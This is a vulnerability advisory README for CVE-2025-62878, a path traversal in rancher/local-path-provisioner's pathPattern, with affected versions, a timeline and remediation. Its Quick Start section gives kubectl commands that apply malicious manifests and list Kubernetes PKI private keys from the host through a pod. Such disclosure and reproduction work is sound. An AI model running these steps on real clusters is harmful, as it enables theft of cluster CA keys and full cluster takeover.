# CVE-2025-62878: Local Path Provisioner Path Traversal

## Overview

| Item | Value |
|------|-------|
| CVE ID | CVE-2025-62878 |
| GHSA ID | GHSA-jr3w-9vfr-c746 |
| Severity | Critical (CVSS 10.0) |
| CWE | CWE-23 (Relative Path Traversal) |
| Affected Component | rancher/local-path-provisioner |
| Affected Versions | v0.0.27 ~ v0.0.32 |
| Fixed Versions | v0.0.33+ |

## Vulnerability Description

A path traversal vulnerability exists in the `pathPattern` parameter of StorageClass. A malicious user can manipulate `pathPattern` using relative path elements (e.g., `../`) to create PersistentVolumes pointing to arbitrary locations on the host node, bypassing the configured base directory restriction.

This allows attackers to:
- Access sensitive host files (e.g., `/etc/kubernetes/pki/`)
- Overwrite critical system files
- Achieve full cluster compromise by stealing Kubernetes CA private keys

## Affected Versions (Verified)

| Version | Release Date | pathPattern Support | Vulnerable |
|---------|--------------|---------------------|------------|
| v0.0.26 | 2023-12-03 | No | **Safe** (feature not exist) |
| v0.0.27 | 2024-05-29 | Yes | **Vulnerable** |
| v0.0.28 | 2024-06-19 | Yes | **Vulnerable** |
| v0.0.29 | 2024-09-03 | Yes | **Vulnerable** |
| v0.0.30 | 2024-10-07 | Yes | **Vulnerable** |
| v0.0.31 | 2025-01-24 | Yes | **Vulnerable** |
| v0.0.32 | 2025-07-31 | Yes | **Vulnerable** |
| v0.0.33 | 2025-12-25 | Yes | **Fixed** |
| v0.0.34 | 2026-01-06 | Yes | **Fixed** |

**Note**: The official GitHub Advisory states "< 0.0.34" is affected, but our testing confirms:
- v0.0.33 is already patched
- v0.0.26 and earlier are not affected (pathPattern feature doesn't exist)
- Actual affected range: **v0.0.27 <= version <= v0.0.32**

## Timeline

| Event | Date |
|-------|------|
| pathPattern feature introduced | 2024-05-26 (commit af85381) |
| First vulnerable release (v0.0.27) | 2024-05-29 |
| Fix commit | 2025-12-24 (commit 1ed6b54) |
| First patched release (v0.0.33) | 2025-12-25 |
| CVE published | 2026-02-04 |

## Reproduction

See [exploit/](./exploit/) directory for detailed reproduction steps and scripts.

### Quick Start

```bash
# 1. Install vulnerable version
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.30/deploy/local-path-storage.yaml

# 2. Apply exploit
kubectl apply -f exploit/malicious-storageclass.yaml
kubectl apply -f exploit/malicious-pvc.yaml
kubectl apply -f exploit/exploit-pod.yaml

# 3. Verify exploitation
kubectl get pv -o jsonpath='{.items[0].spec.hostPath.path}'
# Output: /etc/kubernetes/pki

kubectl exec pki-exploit-pod -- ls -la /stolen-pki/
# Shows Kubernetes PKI certificates and private keys
```

## Remediation

Upgrade to v0.0.33 or later:

```bash
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.33/deploy/local-path-storage.yaml
```

## References

- [GitHub Advisory GHSA-jr3w-9vfr-c746](https://github.com/advisories/GHSA-jr3w-9vfr-c746)
- [Fix Commit 1ed6b54](https://github.com/rancher/local-path-provisioner/commit/1ed6b54)
- [pathPattern Feature Commit af85381](https://github.com/rancher/local-path-provisioner/commit/af85381)
